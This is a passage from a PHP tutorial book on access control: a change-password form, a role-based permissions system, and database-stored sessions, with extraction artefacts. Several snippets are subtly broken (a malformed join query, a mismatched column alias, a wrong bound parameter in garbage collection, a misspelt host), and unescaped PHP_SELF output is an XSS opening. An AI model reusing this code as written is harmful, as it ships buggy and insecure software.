                                                              changepass.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'Session.class.php';
334   The PHP Anthology


       require_once   'Auth.class.php';

       require_once   'AccountMaintenance.class.php';

       require_once   'HTML/QuickForm.php';

       require_once   'dbcred.php';




      We set the error reporting level to E_ALL with the error_reporting function, as
      we’re using PEAR packages, which will cause E_Strict errors under PHP 5. We
      then include our custom classes for session, authorization, and account management,
      the PEAR::HTML_QuickForm package, and our database credentials file.

      Next, we set the $reg_messages array to hold the page content for the different form
      outcomes:

                                                                  changepass.php (excerpt)

       $reg_messages = array(
           'success' => array(
               'title' => 'Password Changed',
               'content' => '<p>Your password has been changed' .
                   ' successfully.</p>'
           ),
           'no_account' => array(
               'title' => 'Account Problem',
               'content' => '<p>We could not find your account.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'change_error' => array(
               'title' => 'Change Password Problem',
               'content' => '<p>There was an error changing your' .
               ' password. Please contact the site administrators,' .
               ' or click ' .
               '<a href="' . $_SERVER['PHP_SELF'] . '">here</a> to' .
               ' try again.</p>'
           )
       );



      We then test to find out whether the user is currently authorized to see the Change
      Password form, with the assistance of the Auth class:
Access Control     335

                                                              changepass.php (excerpt)

 try
 {
   $db = new PDO($dsn, $user, $password);
   $db->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $auth = new Auth($db, 'login.php', 'secret');



At this point, we open a try block; we want to catch any exceptions that may be
thrown from the execution of the rest of the code. Catching any exceptions from
this point will allow us to display an appropriate message on the web page instead
of a PHP error.

We instantiate the PDO and Auth classes; if the user isn’t authorized, he or she will
be redirected to the login form. And if all’s well, we start building the Change
Password form with PEAR::HTML_QuickForm:

                                                              changepass.php (excerpt)

   $form = new HTML_QuickForm('changePass', 'POST');

   function cmpPass($element, $confirm)
   {
     $password = $GLOBALS['form']->getElementValue('newPassword');
     return $password == $confirm;
   }
   $form->registerRule('compare', 'function', 'cmpPass');



After instantiating the HTML_QuickForm object, we define and register the function
cmpPass that will be used to validate the password fields, to ensure that the password
and password confirmation fields match.

Then we add the form:

                                                              changepass.php (excerpt)

   $form->addElement('header', 'MyHeader', 'Change your password');

   // Add a field for the old password
   $form->addElement('password', 'oldPassword',
336   The PHP Anthology


             'Current Password');

         $form->addRule('oldPassword', 'Enter your current password',

             'required', false, 'client');


         // Add a field for the new password

         $form->addElement('password', 'newPassword', 'New Password');

         $form->addRule('newPassword', 'Please provide a password',

             'required', false, 'client');

         $form->addRule('newPassword',

             'Password must be at least 6 characters',

             'minlength', 6, 'client');

         $form->addRule('newPassword',

             'Password cannot be more than 12 chars',

             'maxlength', 50, 'client');

         $form->addRule('newPassword',

             'Password can only contain letters and ' .

             'numbers', 'alphanumeric', NULL, 'client');


         // Add a field for password confirmation

         $form->addElement('password', 'confirm', 'Confirm Password');

         $form->addRule('confirm', 'Please confirm your password',

             'required', false, 'client');

         $form->addRule('confirm', 'Your passwords do not match',

             'compare', false, 'client');


         // Add a submit button

         $form->addElement('submit', 'submit', 'Change Password');




      If the form has been submitted, we can attempt to change the password:

                                                               changepass.php (excerpt)

         if ($form->validate())
         {
           $aMaint = new AccountMaintenance($db);
           $aMaint->changePassword($auth,
               $form->getSubmitValue('oldPassword'),
               $form->getSubmitValue('newPassword')
           );
           $display = $reg_messages['success'];
         }
Access Control     337

On validation of the form, we instantiate an AccountMaintenance object and call
the changePassword method. If no exceptions are thrown, we set the $display
variable to the success message.

If the form has not yet been submitted and validated, we display the form contents:

                                                            changepass.php (excerpt)

     else
     {
       // If not submitted, display the form
       $display = array(
           'title' => 'Change Password',
           'content' => $form->toHtml()
       );
     }
 }



The final task of our main script is to catch any possible exceptions and display
appropriate page content:

                                                            changepass.php (excerpt)

 catch (AccountUnknownException $e)
 {
   $display = $reg_messages['no_account'];
 }
 catch (Exception $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
   $display = $reg_messages['change_error'];
 }
 ?>



The HTML content of the Change Password page is as follows:
338   The PHP Anthology

                                                                            changepass.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           ⋮ HTML Head contents…
         </head>
         <body>
           <h1><?php echo $display['title']; ?></h1>
           <?php echo $display['content']; ?>
         </body>
       </html>



      Finally, the new Change Password page can be seen in Figure 10.5.




                                Figure 10.5. The new Change Password page


      Discussion
      Now that you know how to allow users to change their passwords, it should be no
      problem for you to change other account settings, such as the first and last names
      and the signature—simply add the details to the AccountMaintenance class. If you
      want to allow users to change their email addresses, you’ll need to examine the re­
      gistration procedure used earlier in “How do I build a registration system?”, and
      modify the SignUp class. You should make sure that users confirm a new email
      address before you allow them to change it.
Access Control      339


How to do I build a permissions system?

In the previous sections, we built an authentication system that provided global
security for your web site. But, consider this: are all the members of your site equal?
You probably don’t want all of your users to have access to edit and delete articles,
for example. To deal with this issue, you need to add to the security system further
functionality that allows you to assign permissions to groups of members, permitting
only these users to perform specific actions.

Rather than assign permissions to single accounts, which would quickly become a
nightmare to administer, we’ll build a permissions system in terms of users, groups,
and permissions. Users (login accounts) will be assigned to groups, which will have
names like Administrators, Authors, Managers, and so on. Permissions reflect actions
that users will be allowed to perform within the site, and they will also be assigned
to groups. >From an administration perspective, this system will be easy to manage,
as it’ll be a simple matter to see which Permissions a particular group has, and
which users are assigned to that group.

This kind of access control is known as role-based access control. If you’d like to
read more on the theory of role-based access control, the web site of the US Govern­
ment National Institute of Standards and Technology has a complete section on
it.11

Solution
Let’s leap in and build our permission system.

Setting Up the Database
Building the permissions system initially requires the construction of many-to-many
relationships between database tables. This is explained as follows:

■ A user can belong to many groups.
■ A group may have many users.
■ A permission can be assigned to many groups.
■ A group may have many permissions.



11
     http://csrc.nist.gov/rbac/
340   The PHP Anthology

      In practical terms, the way to build many-to-many relationships in MySQL is to use
      a bridge table, which relates to two other tables. The bridge table stores a two-column
      index, each column being the key of one of the two related tables. For example, we
      have a user table and a collection table in our database. Here’s the SQL for those
      tables:

                                                                    access_control.sql (excerpt)

       CREATE TABLE user (
         user_id     INT(11)      NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50) DEFAULT NULL,
         firstName   VARCHAR(50) DEFAULT NULL,
         lastName    VARCHAR(50) DEFAULT NULL,
         signature   TEXT         NOT NULL,
         PRIMARY KEY (user_id),
         UNIQUE KEY user_login (login)
       );

       CREATE TABLE collection (
         collection_id INT(11)     NOT NULL auto_increment,
         name          VARCHAR(50) NOT NULL default '',
         description   TEXT        NOT NULL,
         PRIMARY KEY (collection_id)
       );



      Each user has a unique ID and login name, and several other pieces of information
      associated with his or her record. Each group has a unique ID, a name, and a descrip­
      tion. We’ll use a bridge table to link users to their groups, and groups to their users.
      Here’s the definition of the user2collection lookup table:

                                                                    access_control.sql (excerpt)

       CREATE TABLE user2collection (
         user_id       INT(11)     NOT NULL default '0',
         collection_id INT(11)     NOT NULL default '0',
         PRIMARY KEY (user_id, collection_id)
       );
Access Control       341

Notice that the primary key for the table uses both columns: this ensures that no
combination of user_id and collection_id can appear more than once.


           Be Aware of Reserved Words
         I use “collection” to refer to “group” in MySQL. “Group” is a reserved word in
         SQL, so it shouldn’t be used as a table name. Technically, it can be used with the
         proper quoting, but why run the risk of confusing ourselves—and possibly MySQL?
         You can find more about SQL reserved words at the MySQL web site.12


Here’s some hypothetical data that shows how the bridge table can be used:

 mysql> select * from user2collection;

 +---------+---------------+

 | user_id | collection_id |

 +---------+---------------+

 |       1 |             1 |
 |       2 |             1 |
 |       2 |             2 |
 |       3 |             1 |
 |       4 |             1 |
 +---------+---------------+

 5 rows in set (0.00 sec)



This data tells us that user 1 is a member of group 1, user 2 is a member of groups
1 and 2, user 3 is a member of group 1, and so on.

We’ll also need a permission table for the purpose of keeping track of permissions:

                                                                    access_control.sql (excerpt)

 CREATE TABLE permission (
   permission_id INT(11)     NOT NULL AUTO_INCREMENT,
   name          VARCHAR(50) NOT NULL DEFAULT '',
   description   TEXT        NOT NULL,
   PRIMARY KEY (permission_id)
 );




12
     http://dev.mysql.com/doc/refman/4.1/en/reserved-words.html
342   The PHP Anthology

      Each permission has a unique ID, a name, and a description. Permission names will
      represent actions; view, create, edit and delete, for example. We’ll need a bridge
      table to link groups to permissions—here’s the collection2permission table:

                                                                   access_control.sql (excerpt)

       CREATE TABLE collection2permission (
         collection_id INT(11)     NOT NULL DEFAULT '0',
         permission_id INT(11)     NOT NULL DEFAULT '0',
         PRIMARY KEY (collection_id, permission_id)
       );



      With the lookup tables defined, we can now perform queries across the tables to
      identify the permissions a particular user has been allowed. For example, the fol­
      lowing query returns all the permission names for the user with user_id 1:

       SELECT p.name as permission

       FROM

         user2collection uc, 

         INNER JOIN collection2permission cp 

           ON uc.collection_id = cp.collection_id

         INNER JOIN permission p

           ON cp.collection_id = p.collection_id

       WHERE uc.user_id = 1;



      Note that I’ve used aliases for table names, such as user2collection uc, to make
      writing the query easier.

      If you’ve downloaded and installed the sample access_control database mentioned
      in the introduction to this chapter, you’ll find it contains three sample user accounts
      with the details shown in Table 10.1.

      Table 10.1. Sample User Accounts

       Login                         Password                       Group

       jackblack                     password                       Users

       jackwhite                     password                       Editors

       siteadmin                     password                       Administrators
Access Control       343

The access_control database also contains three sample groups, as shown in
Table 10.2.

Table 10.2. Sample Groups

 Group                               Permissions
 Users                               view
 Editors                             view, create, edit
 Administrators                      view, create, edit, delete


The User Class
The User class will encapsulate all the functionality for checking a user’s permis­
sions. Our class uses the following configuration settings:

                                                                  access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login

 ;user login table details
 [users_table]
 table=user
 col_id=user_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName
 col_signature=signature

 ;Permission table details
 [permission_table]
 table=signup
 col_id=permission_id
 col_name=name

 ;Collection table details
 [collection_table]
 table=collection
344   The PHP Anthology


       col_id=collection_id

       col_name=name


       ;User to Collection lookup table details

       [user_to_collection_table]

       table=user2collection

       col_id=user_id

       col_collection_id=collection_id


       ;Collection to Permission lookup table details

       [collection_to_permission_table]

       table=collection2permission

       col_id=collection_id

       col_permission_id=permission_id




      We define some custom exception classes to provide a consistent level of error
      handling:

                                                                   User.class.php (excerpt)

       class UserException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class UserDatabaseException extends UserException {}



      Our base class, UserException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclass
      UserDatabaseException represents a database problem. If you were to add further
      functionality to the User class, you could create further custom exceptions based
      on the UserException class to cover all possible exception situations.

      We begin to create the class by defining some class properties:
Access Control      345

                                                               User.class.php (excerpt)

 class User
 {
   private $db;
   protected $cfg;
   private $userId;
   private $firstName;
   private $lastName;
   private $email;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, and the remaining properties will contain information from
the user’s account details.

The constructor takes an instance of the PDO class, loads the configuration file, and
calls the populate method:

                                                               User.class.php (excerpt)

   public function __construct(PDO $db)
   {
     $this->db = $db;
     $this->cfg = parse_ini_file('access_control.ini', TRUE);
     $this->populate();
   }



Next comes the populate method:

                                                               User.class.php (excerpt)

   private function populate()
   {
     $var_login = $this->cfg['login_vars']['login'];
     $user_table = $this->cfg['users_table']['table'];
     $user_id = $this->cfg['users_table']['col_id'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_email = $this->cfg['users_table']['col_email'];
     $user_first = $this->cfg['users_table']['col_name_first'];
     $user_last = $this->cfg['users_table']['col_name_last'];
346   The PHP Anthology

      We load some configuration values into local variables to aid the readability of the
      code.

      Next, we attempt to look up the user’s details in the database:

                                                                     User.class.php (excerpt)

            $session = new Session();
            try
            {
              $sql = "SELECT
                  " . $user_id . ", " . $user_email . ",
                  " . $user_first . ", " . $user_last . "
                  FROM
                  " . $user_table . "
                  WHERE
                  " . $user_login . " = :login";
              $stmt = $this->db->prepare($sql);
              $login = $session->get($var_login);
              $stmt->bindParam(':login', $login);
              $stmt->execute();
              $row = $stmt->fetch(PDO::FETCH_ASSOC);
            }
            catch(PDOException $e)
            {
              throw new UserDatabaseException('Database error when' .
                  ' populating user details: '.$e->getMessage());
            }



      We first need to instantiate a new session object (which we built in “How do I create
      a session class?”). The session login variable is then used as the key to find the
      user’s details in the user table. If a PDOException is thrown, we throw our custom
      UserDatabaseException.

      Once we’ve retrieved the user’s record from the database, we store all the detail in
      the User object properties:
Access Control      347

                                                              User.class.php (excerpt)

     $this->userId = $row[$user_id];
     $this->email = $row[$user_email];
     $this->firstName = $row[$user_first];
     $this->lastName = $row[$user_last];
    }



Populate pulls this user’s record from the database and stores various useful pieces
of information from that record in the object’s variables so that we can access them
easily; for example, when we want to display the user’s name on the page. The most
important aspect is to gather the user_id value from the database, for the purpose
of checking permissions.

We also add a few accessor methods. Accessor methods allow public access to
otherwise protected object properties—they allow the properties to be read without
granting public access to users of the class to write to them:

                                                              User.class.php (excerpt)

   public function getId()
   {
     return $this->userId;
   }

   public function getFirstName()
   {
     return $this->firstName;
   }

   public function getLastName()
   {
     return $this->lastName;
   }

   public function getEmail()
   {
     return $this->email;
   }



Finally, we add the checkPermission method. This method takes a named permis­
sion as an argument and checks that the user has that permission:
348   The PHP Anthology

                                                                    User.class.php (excerpt)

         public function checkPermission($permission)
         {
           if (!isset($this->permissions))
           {
             $perm_table = $this->cfg['permission_table']['table'];
             $perm_id = $this->cfg['permission_table']['col_id'];
             $perm_name = $this->cfg['permission_table']['col_name'];
             $u2c_table = $this->cfg['user_to_collection_table']['table'];
             $u2c_id = $this->cfg['user_to_collection_table']['col_id'];
             $c2p_table = $this->cfg['collection_to_permission_table']
             ➥['table'];
             $c2p_id = $this->cfg['collection_to_permission_table']
             ➥['col_id'];
             $c2p_pid = $this->cfg['collection_to_permission_table']
             ➥['col_permission_id'];




      The first step we take is to check that the permissions array for this user has been
      set. If not, we proceed with the database lookup. Before we perform the lookup,
      though, we assign some configuration settings to local variables to help improve
      our code’s readability.

      Next, we assemble the SQL query and perform the lookup using the User->userId
      property as the key:

                                                                    User.class.php (excerpt)

              try
              {
                $this->permissions = array();
                $this->permissions = array();
                $sql = 'SELECT p.'. $perm_name .' as perm
                    FROM
                    ' . $u2c_table . ' uc
                    INNER JOIN ' . $c2p_table . ' cp
                    ON uc.' . $u2c_id . ' = cp.' . $c2p_id . '
                    INNER JOIN ' . $perm_table . ' p
                    ON cp.' . $c2p_pid . ' = p.' . $perm_id . '
                    WHERE uc.user_id =:user';
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':user', $this->userId);
Access Control      349


             $stmt->execute();

             while ($row = $stmt->fetch(PDO::FETCH_ASSOC))

             {

               $this->permissions[] = $row['permission'];

             }

           }

           catch(PDOException $e)

           {

             throw new UserDatabaseException('Database error when' .

               ' checking permissions: '.$e->getMessage());

           }

         }




If the lookup has returned database rows, we store them in object User->permissions
property array. This means that if we need to check permissions more than once
on a page, that check will only come at the cost of a single query. And, as usual, if
a PDOException is thrown, we in turn throw our custom UserDatabaseException.

Finally, we check that the permission passed into the method as an argument in
the $permission variable is included in the user’s permissions array:

                                                                User.class.php (excerpt)

         if (in_array($permission, $this->permissions))
         {
           return true;
         }
         else
         {
           return false;
         }
     }
 }



The checkPermission simply returns true if the user has the permission, and false
if not.

The Permissions Test Page
Now, to test our permissions system, we can build a permissions testing page. This
testing page will require you to log in using the details of one of the accounts in the
350   The PHP Anthology

      user table, and will simulate an attempt to access one of four defined permission
      levels in the permission table—view, create, edit, and delete.

      First, we need to include all the required classes and the database credentials file:

                                                                   permissions.php (excerpt)

       <?php
       require_once    'Session.class.php';
       require_once    'Auth.class.php';
       require_once    'User.class.php';
       require_once    'dbcred.php';



      Next, we instantiate our PDO, Auth (which we met in “How do I create a class to
      control access to a section of the site?”), and User objects:

                                                                   permissions.php (excerpt)

       try
       {
         $db = new PDO($dsn, $user, $password);
         $auth = new Auth($db, 'login.php', 'secret');
         $authuser = new User($db);



      The Auth object will make sure the current user is authorized, and redirect them to
      the login form if not. If the user is authorized, we create a User object in order to
      be able to check the user’s permissions.

      We’re simulating permissions through a query string variable—$_GET['view']:

                                                                   permissions.php (excerpt)

         switch (@$_GET['view']) {
           case 'create':
             $permission = 'create';
             $msg = 'You are able to create new content.';
             break;
           case 'edit':
             $permission = 'edit';
             $msg = 'You are able to edit existing content.';
             break;
           case 'delete':
Access Control      351


       $permission     = 'delete';

       $msg = 'You     are able to delete existing content.';

       break;

     default:

       $permission     = 'view';

       $msg = 'You     are able to read existing content.';

   }




We set the permission level and the $msg variable—the message that appears on the
page—to reflect the value of $_GET['view'].

Next, we test the user’s permissions:

                                                            permissions.php (excerpt)

   if (!$authuser->checkPermission($permission)) {
     $msg = 'You do not have permission to do this.';
   }



If the user doesn’t have the required permission, we take appropriate action. Since
this demonstration is merely a test, we simply set the page message to indicate that
the user does not have the required permission level. In a production web applica­
tion, you’d redirect the user to the login form, adding a message to indicate that
they’re not authorized to obtain that level of access.

Finally, we make sure to catch any exceptions and take appropriate action:

                                                            permissions.php (excerpt)

 }
 catch (Exception $e)
 {
   $msg = 'An error has occurred: ' . $e->getMessage();
 }
 ?>



The only task left is to create the HTML for our permissions testing page:
352   The PHP Anthology

                                                                   permissions.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           ⋮ HTML Head contents…
         </head>
         <body>
           <h1>Permissions Test</h1>
           <p>
             <a href="<?php echo $_SERVER['PHP_SELF']; ?>">View</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=create">Create</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=edit">Edit</a> |
             <a href="<?php echo $_SERVER['PHP_SELF'];
               ?>?view=delete">Delete</a>
           </p>
           <h2><?php echo $authuser->getFirstName() . ' ' .
               $authuser->getLastName(); ?></h2>
           <p>Permission Level: '<?php echo $permission ?>'</p>
           <p><?php echo $msg; ?></p>
         </body>
       </html>



      The testing page is very simple. First, we have a menu of links that test each permis­
      sion level by appending the appropriate query string to the link URLs. Then ,we
      have a simple page body that consists of the current user’s name, the current per­
      mission level, and the message set by the permissions test.

      Discussion
      The User class fetches data on a “need to know” basis. That is, despite the fact that
      some user data is retrieved on instantiation using the populate method, the data
      pertaining to permissions may not be needed every time the User class is instantiated.
      It’s likely that we’ll only check permissions on a restricted number of pages, so we
      can save ourselves a database query when the user views public pages, and leave
      the checkPermission method to be called only when needed. This approach of only
      fetching data from the database at the moment it is needed—as opposed to performing
      all the queries at the beginning—is known as lazy fetching, and can be a useful ap­
      proach to reducing unnecessary queries and performance overhead.
Access Control      353

The permissions testing page was a simple example, of course, but you could use
the checkPermission method any way you like—perhaps within if statements to
decide what a user is allowed to do and see. Another approach would be to use a
variable, such as the $msg variable we’ve used here, to store the name of a PHP
script, which contained the restricted content, for use with an include statement.

Otherwise, that’s all there is to it. Now, all you need to do is build an administration
interface to control Users, Groups, and Permissions. Well, what are you waiting for?


How do I store sessions in a database?
As discussed earlier, in “How do I use sessions?”, the default behavior of sessions
in PHP on the server side is to create a temporary file in which session data is stored.
This file is usually kept in the temporary directory of the operating system and, as
such, presents a security risk to your applications, especially if you’re using a shared
server.

Solution
Use the PHP function session_set_save_handler to specify a custom session
handler that provides an alternative data store that’s fully under your control. The
session_set_save_handler function definition is as follows:


 bool session_set_save_handler (callback $open,

     callback $close,

     callback $read,

     callback $write,

     callback $destroy,

     callback $gc

 );



Each callback argument is a function that must conform to the PHP session’s API.
You can read more about the function on The PHP Manual page.13 You can simply
implement a separate function for each callback; however, in this solution we create
a new class—the DatabaseSession class—to encapsulate all our session handling
needs, and use a PDO object to connect to a database and store session information
there.


13
     http://www.php.net/session_set_save_handler/
354   The PHP Anthology

      Before we delve deep into the details of the class, I’ll show you the create statement
      for the session table we use. This statement provides a minimal amount of inform­
      ation for you to keep track of, so feel free to add more if you wish—for example,
      you might like to store the IP address or the last page visited. Just remember to add
      the new columns and values to the queries that are used throughout the class’s
      methods below:

       CREATE TABLE session (

         sess_id       VARCHAR(255),

         sess_start    DATETIME,

         sess_last_acc DATETIME,

         sess_data     VARCHAR(255),

         PRIMARY KEY (sess_id)

       );



      The DatabaseSession Class
      Now, let’s look at the class. We begin by defining the class properties:

                                                           DatabaseSession.class.php (excerpt)

       class DatabaseSession
       {
         private $sess_table;
         private $sess_db;
         private $sess_db_host;
         private $sess_db_usr;
         private $sess_db_pass;
         private $db;



      $sess_table will store the database table name, $sess_db will store the database
      name, $sess_db_host will store the database server hostname, $sess_db_usr will
      store the database username, and $sess_db_pass will store the database password.
      The $db property will store the PDO object used for all the database queries.

      Next, we define the constructor method:
Access Control      355

                                                   DatabaseSession.class.php (excerpt)

   public function __construct($sess_db_usr = 'user',
       $sess_db_pass = 'passwd',
       $sess_table = 'session',
       $sess_db = 'dbname',
       $sess_db_host = 'locolhost')
   {
     $this->sess_db_usr = $sess_db_usr;
     $this->sess_db_pass = $sess_db_pass;
     $this->sess_table = $sess_table;
     $this->sess_db = $sess_db;
     $this->sess_db_host = $sess_db_host;
   }



The constructor simply stores the database information passed to the method
within the object’s properties.

The first function callback that we must pass to the session_set_save_handler
function is an open function, which is called when a session is started. The open
method of the DatabaseSession class will handle that job:

                                                   DatabaseSession.class.php (excerpt)

   public function open($path, $name)
   {
     try
     {
       $dsn = "mysql:host={$this->sess_db_host};".
           "dbname={$this->sess_db}";
       $this->db = new PDO($dsn, $this->sess_db_usr,
           $this->sess_db_pass );
       $this->db->setAttribute(PDO::ATTR_ERRMODE,
           PDO::ERRMODE_EXCEPTION);
     }
     catch (PDOException $e)
     {
       error_log('Error connecting to the session database.');
       error_log('Reason given:'.$e->getMessage()."n");
       return false;
     }
     return true;
   }
356   The PHP Anthology

      This method is called with two string arguments—the path of the session file and
      the name of the file—and must return either true or false. The path and filename
      information is irrelevant to us as we’re using a database, so we do nothing with it.
      In the method, we make the connection to the database that will hold the session
      data. If there’s an error, we return false; if the database connection is successful, we
      return true.

      The next function callback we need to implement is the close function, so we add
      a close method to our class:

                                                            DatabaseSession.class.php (excerpt)

         public function close()
         {
           $this->db = null;
           return true;
         }



      The close method is called when we end a session, and must return either true or
      false. It isn’t uncommon to manually call the garbage collection (gc) method here,
      though it isn’t strictly necessary—PHP will do its own garbage collection throughout.
      We remove our database connection by setting the close method to null.

      session_set_save_handler also requires that a read function be implemented.
      The read function needs to take the session ID as an argument and return a
      string—even an empty one, if that’s appropriate. We implement a read method in
      our class:

                                                            DatabaseSession.class.php (excerpt)

         public function read($sess_id)
         {
           try
           {
             $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
                 "sess_id = :id";
             $stmt = $this->db->prepare($sql);
             $stmt->execute(array(':id'=>$sess_id));
             $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
           }
           catch (PDOException $e)
Access Control      357


     { 

       error_log('Error reading the session data table in the' .

           ' session reading method.');

       error_log(' Query with error: '.$sql);

       error_log(' Reason given:'.$e->getMessage()."n");

       return ''; 

     }

     if (count($res) > 0)

     { 

       return isset($res[0]['sess_data']) ? 

           $res[0]['sess_data'] : '';

     }

     else

     {

       return '';

     }

   }




The read method retrieves the session data from the database, using the session ID
as the key, and returns the data as a string. If no data is found or there’s a database
error, an empty string is returned.

After the read function, the next function callback we need to implement is the
write function. This function, as the name implies, handles the writing of the session
data. The function is required to take two arguments—the session ID and the session
data—and the return value must be either true or false. We implement a write
method in our class-based solution. In our method, we first see if the session ID is
already in the database:

                                                     DatabaseSession.class.php (excerpt)

   public function write($sess_id, $data)
   {
     try
     {
       $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
           "sess_id = :id";
       $stmt = $this->db->prepare($sql);
       $stmt->execute(array(':id'=>$sess_id));
       $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
     }
     catch (PDOException $e)
358   The PHP Anthology


            { 

              error_log('Error reading the session data table in the' .

                  ' session writing method.');

              error_log(' Query with error: '.$sql);

              error_log(' Reason given:'.$e->getMessage()."n");

              return false; 

            }




      The $res variable contains the result of our database lookup. Based upon this result,
      we either update the existing session record with an SQL UPDATE query or insert a
      new one with an SQL INSERT query:

                                                          DatabaseSession.class.php (excerpt)

            try
            {
              if (count($res) > 0)
              {
                $sql = "UPDATE {$this->sess_table} SET" .
                    " sess_last_acc = NOW(), sess_data = :data" .
                    " WHERE sess_id = :id";
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':data', $data);
                $stmt->bindParam(':id', $sess_id);

                }
                else
                {
                  $sql ="INSERT INTO {$this->sess_table}(sess_id," .
                      " sess_start, sess_last_acc," .
                      " sess_data) VALUES (:id, NOW(), NOW(), :data)";
                  $stmt = $this->db->prepare($sql);
                  $stmt->bindParam(':id', $sess_id);
                  $stmt->bindParam(':data', $data);
                }
                $res = $stmt->execute();
            }
Access Control        359

If you know you’ll only be using MySQL as your database, consider using the RE­
                     14
PLACE syntax instead. Since we don’t want to limit our class to MySQL, we use
the longer but more compatible method above.

Finally, we need to catch any PDOExceptions and return true or false:

                                                                DatabaseSession.class.php (excerpt)

          catch (PDOException $e)
          {
            error_log('Error writing to the session data table.');
            error_log('Query with error: '.$sql);
            error_log('Reason given:'.$e->getMessage()."n");
            return false;
          }
          return true;
      }



Our next task is to implement a destroy function, which, as the name suggests, is
called when the session is destroyed. It receives the session ID as an argument and
must return either true or false. In our class method destroy, we simply delete the
session from the database using the session ID as the key, and return false if an error
occurs or true if the operation succeeds:

                                                                DatabaseSession.class.php (excerpt)

      public function destroy($sess_id)
      {
        try
        {
          $sql = "DELETE FROM {$this->sess_table} WHERE sess_id = :id";
          $stmt = $this->db->prepare($sql);
          $stmt->execute(array(':id'=>$sess_id));
        }
        catch (PDOException $e)
        {
          error_log('Error destroying the session.');
          error_log('Query with error: '.$sql);


14
     REPLACE is a MySQL extension to the SQL standard that either inserts a new row, or deletes an old
row and inserts the new row if the old row had the same value as the new row for a PRIMARY KEY or
UNIQUE index. You can read more about it at http://dev.mysql.com/doc/refman/5.1/en/replace.html.
360   The PHP Anthology


             error_log('Reason given:'.$e->errorMessage()."n");

             return false;

           }

           return true;

         }




      The final function we are required to implement is the gc, or garbage collection,
      function, which is used to clean out any old sessions that were never closed properly.
      It receives an integer argument for the “time to live” (TTL) value for a session. In
      our class method, gc, we delete any session record where the last access time is less
      then the current time, minus the TTL value:

                                                           DatabaseSession.class.php (excerpt)

         public function gc($ttl)
         {
           $end = time() - $ttl;
           try
           {
             $sql = "DELETE FROM {$this->sess_table} WHERE" .
                 " sess_last_acc <:end";
             $stmt = $this->db->prepare($sql);
             $stmt->execute(array(':id'=>$end));
           }
           catch (PDOException $e)
           {
             error_log('Error with the garbage collection method of the' .
                 ' session class.');
             error_log('Query with error: '.$sql);
             error_log('Reason given:'.$e->getMessage());
             return false;
           }
           return true;
         }



      The garbage collection method is called by PHP as dictated by the php.ini settings
      session.gc_probability and session.gc_divisor, and is checked every time a
      new session is started. Again, you can call it manually in the session close method
      if you wish.
Access Control     361


           MySQL MyISAM Engine Performance
         If your session table sees high rates of insertions and deletions, you should consider
         adding an OPTIMIZE TABLE query to the garbage collection function to regain
         memory and help increase performance. For more information on OPTIMIZE
         TABLE, see the MySQL manual.15


Finally, we implement a class __destruct method. This step is necessitated by the
changes that were made in how PHP sessions are closed after version 5.0.5. Basically,
we just have to make sure the session is explicitly written and closed by calling the
session_write_close function. You can read more about this task on the manual
page.16 Here’s our __destruct method and the end of our class definition:

                                                              DatabaseSession.class.php (excerpt)

      public function __destruct()
      {
        session_write_close();
      }
 }



Using the DatabaseSession Class
Here’s a simple script to test our new DatabaseSession class:

                                                                          dbsession.php (excerpt)

 <?php
 require_once 'DatabaseSession.class.php';

 $session = new DatabaseSession('user', 'secret', 'session',
     'access_control','localhost');
 session_set_save_handler(array($session, 'open'),
     array($session, 'close'),
     array($session, 'read'),
     array($session, 'write'),
     array($session, 'destroy'),
     array($session, 'gc')
 );


15
     http://dev.mysql.com/doc/refman/5.1/en/optimize-table.html
16
     http://www.php.net/session_set_save_handler/
362   The PHP Anthology


       session_start(); 


       $name = (isset($_SESSION['name']))? $_SESSION['name'] :'';


       if ($name !== '')

       {

           echo 'Welcome ', $name, ' to your session!';

       }

       else

       {

           echo 'Lets start the session!';

           $_SESSION['name'] = 'PHP';

       }

       ?>




      We include our DatabaseSession class, then instantiate the DatabaseSession object.
      Next, we use session_set_save_handler to register our custom PHP session-
      handling methods. Then we have a quick little demonstration to show us that the
      session is working—the first time you load the web page you should see the message
      “Let’s start the session!" We then set the $_SESSION['name'] to PHP. When you re­
      fresh the web page, the message should change to “Welcome PHP to your session!”
      which indicates that our session data is being stored and retrieved correctly in the
      database.

      Welcome to database-saved sessions!


      Summary
      In this chapter we’ve investigated HTTP authentication and PHP sessions, and
      created a complete access control system that can manage user registrations, pass­
      word resets, and changes, including authorization, groups, and multiple permission
      levels.

      Phew! Well, there you have it—total access control over your site! Now you have
